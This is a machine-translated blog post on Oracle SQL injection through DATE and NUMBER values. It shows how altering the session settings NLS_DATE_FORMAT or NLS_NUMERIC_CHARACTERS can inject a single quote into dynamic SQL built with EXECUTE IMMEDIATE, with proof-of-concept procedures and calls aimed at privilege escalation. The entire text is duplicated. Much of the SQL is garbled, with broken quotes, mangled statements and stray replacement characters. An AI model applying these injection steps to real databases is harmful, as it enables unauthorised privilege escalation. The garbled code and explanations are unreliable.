Personal opinion
- 2020-06-07 05:28:51
- OfStack
Don't worry too much if you execute the SQL statement or parameter binding directly,
Such as the ORACLE stored procedure below
create or replace procedure kjdatepoc(date d)
as
begin
insert into kjdatetable values(d);
commit;
end;
There is no need to worry about the new SQL injection attack, so where can DATE and NUMBER injection attacks happen? ? Generally, dynamic SQL is used without parameter binding.
For example, DBMS_SQL or EXECUTE IMMEDIATE are commonly used by engineers
Look at the following stored procedure
create or replace procedure kjdatepoc(date d)
as
begin
execute immediate 'insert into kjdatetable values('|| d ||')';
commit;
end;
If the above stored procedure or function is encountered, the value of NLS_DATE_FORMAT in SESSION can also be modified to achieve the purpose of SQL injection.
The expat PAPER is very detailed, and I won't make any nonsense of it here.
Except for the NUMBER injection, I didn't explain it much. I just showed you that you can print single quotes!
Look at the following statement
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = "';
999999 D99999 SELECT to_number (1000.10001, ' ') | | "FROM DUAL;
Output 1 result
1000 '10001
It's just one more single quote, so what's the point? On the bright side! It's valuable in certain situations! Look at the following stored procedure
create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)
is
SecStr varchar2(1000);
begin
SecStr: = replace (kjexpstr, ""," "");
sys.dbms_output.put_line('SELECT * FROM DUAL ID='||kjexpnum||' and name= '||SecStr|| ");
end;
Internally replaced varchar type! We can test it
begin
numinjpoc (1000, '� ");
end;
Its output SQL statement is
SELECT * FROM WHERE ID=1000 and name= ""
The single quote has been escaped
So how do we do it in combination with this NUMBER type?
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = "';
begin
999999 D99999 numinjpoc (TO_NUMBER (0.10001, ' '), '| | kj. exp () �');
end;
Look at the output
SELECT * DUAL WHERE ID='10001 and name='||kj ()...
So you can attack it indirectly...
After the cooperation of ALTER SESSION is required to a certain degree, it is necessary to attack 1 function or procedure inside the system to enhance the authority. It is not a good idea to break through, but for single statement SQL injection attack, with the result as the guide! This approach doesn't do much.
Such as the ORACLE stored procedure below
create or replace procedure kjdatepoc(date d)
as
begin
insert into kjdatetable values(d);
commit;
end;
There is no need to worry about the new SQL injection attack, so where can DATE and NUMBER injection attacks happen? ? Generally, dynamic SQL is used without parameter binding.
For example, DBMS_SQL or EXECUTE IMMEDIATE are commonly used by engineers
Look at the following stored procedure
create or replace procedure kjdatepoc(date d)
as
begin
execute immediate 'insert into kjdatetable values('|| d ||')';
commit;
end;
If the above stored procedure or function is encountered, the value of NLS_DATE_FORMAT in SESSION can also be modified to achieve the purpose of SQL injection.
The expat PAPER is very detailed, and I won't make any nonsense of it here.
Except for the NUMBER injection, I didn't explain it much. I just showed you that you can print single quotes!
Look at the following statement
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = "';
999999 D99999 SELECT to_number (1000.10001, ' ') | | "FROM DUAL;
Output 1 result
1000 '10001
It's just one more single quote, so what's the point? On the bright side! It's valuable in certain situations! Look at the following stored procedure
create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)
is
SecStr varchar2(1000);
begin
SecStr: = replace (kjexpstr, ""," "");
sys.dbms_output.put_line('SELECT * FROM DUAL ID='||kjexpnum||' and name= '||SecStr|| ");
end;
Internally replaced varchar type! We can test it
begin
numinjpoc (1000, '� ");
end;
Its output SQL statement is
SELECT * FROM WHERE ID=1000 and name= ""
The single quote has been escaped
So how do we do it in combination with this NUMBER type?
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = "';
begin
999999 D99999 numinjpoc (TO_NUMBER (0.10001, ' '), '| | kj. exp () �');
end;
Look at the output
SELECT * DUAL WHERE ID='10001 and name='||kj ()...
So you can attack it indirectly...
After the cooperation of ALTER SESSION is required to a certain degree, it is necessary to attack 1 function or procedure inside the system to enhance the authority. It is not a good idea to break through, but for single statement SQL injection attack, with the result as the guide! This approach doesn't do much.